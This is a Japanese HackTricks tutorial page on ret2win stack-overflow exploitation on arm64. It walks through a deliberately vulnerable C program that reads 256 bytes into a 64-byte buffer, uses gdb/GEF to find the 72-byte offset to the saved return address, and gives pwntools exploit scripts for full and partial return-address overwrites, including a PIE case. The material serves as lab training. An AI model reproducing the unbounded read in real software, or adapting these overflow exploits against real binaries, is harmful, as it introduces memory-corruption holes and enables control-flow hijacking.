HackTricksRet2win - arm64
Reading time: 6 minutes
tip
AWSハッキングを学び、実践する:
HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:
HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。
arm64の紹介は以下を参照してください:
Code
#include <stdio.h>
#include <unistd.h>
void win() {
printf("Congratulations!\n");
}
void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}
int main() {
vulnerable_function();
return 0;
}
PIEとカナリアなしでコンパイル:
clang -o ret2win ret2win.c -fno-stack-protector -Wno-format-security -no-pie
オフセットの特定
パターンオプション
この例は GEF を使用して作成されました:
gefでgdbを起動し、パターンを作成して使用します:
gdb -q ./ret2win
pattern create 200
run
.png)
arm64は、レジスタx30(侵害された)にあるアドレスに戻ろうとします。これを利用してパターンオフセットを見つけることができます:
pattern search $x30
.png)
オフセットは72(9x48)です。
スタックオフセットオプション
最初に、pcレジスタが格納されているスタックアドレスを取得します:
gdb -q ./ret2win
b *vulnerable_function + 0xc
run
info frame
.png)
次に、read()の後にブレークポイントを設定し、read()が実行されるまで続けて、13371337のようなパターンを設定します:
b *vulnerable_function+28
c
.png)
このパターンがメモリにどこに保存されているかを見つけます:
.png)
次に: 0xfffffffff148 - 0xfffffffff100 = 0x48 = 72
.png)
No PIE
Regular
win 関数のアドレスを取得します:
objdump -d ret2win | grep win
ret2win: file format elf64-littleaarch64
00000000004006c4 <win>:
エクスプロイト:
from pwn import *
# Configuration
binary_name = './ret2win'
p = process(binary_name)
# Prepare the payload
offset = 72
ret2win_addr = p64(0x00000000004006c4)
payload = b'A' * offset + ret2win_addr
# Send the payload
p.send(payload)
# Check response
print(p.recvline())
p.close()
.png)
Off-by-1
実際、これはスタックに保存されたPCでオフバイ-2のようになります。すべてのリターンアドレスを上書きするのではなく、最後の2バイトだけを0x06c4で上書きします。
from pwn import *
# Configuration
binary_name = './ret2win'
p = process(binary_name)
# Prepare the payload
offset = 72
ret2win_addr = p16(0x06c4)
payload = b'A' * offset + ret2win_addr
# Send the payload
p.send(payload)
# Check response
print(p.recvline())
p.close()
.png)
ARM64の別のオフバイワンの例は、https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/で見つけることができます。これは架空の脆弱性における実際のオフバイ-ワンです。
PIEあり
tip
バイナリを**-no-pie引数なしでコンパイルしてください**
オフバイ-2
リークがないと、勝利関数の正確なアドレスはわかりませんが、バイナリから関数のオフセットを知ることができ、上書きしているリターンアドレスがすでに近いアドレスを指していることを考慮すると、この場合、勝利関数へのオフセット(0x7d4)をリークし、そのオフセットを使用することが可能です:
.png)
from pwn import *
# Configuration
binary_name = './ret2win'
p = process(binary_name)
# Prepare the payload
offset = 72
ret2win_addr = p16(0x07d4)
payload = b'A' * offset + ret2win_addr
# Send the payload
p.send(payload)
# Check response
print(p.recvline())
p.close()
tip
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。